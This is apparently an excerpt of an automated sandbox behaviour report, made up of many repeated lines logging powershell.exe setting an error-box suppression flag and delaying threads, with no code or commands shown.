                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3475Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6425Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4019Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2806Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5807Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3974Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4221Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2508Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3629Jump to behavior
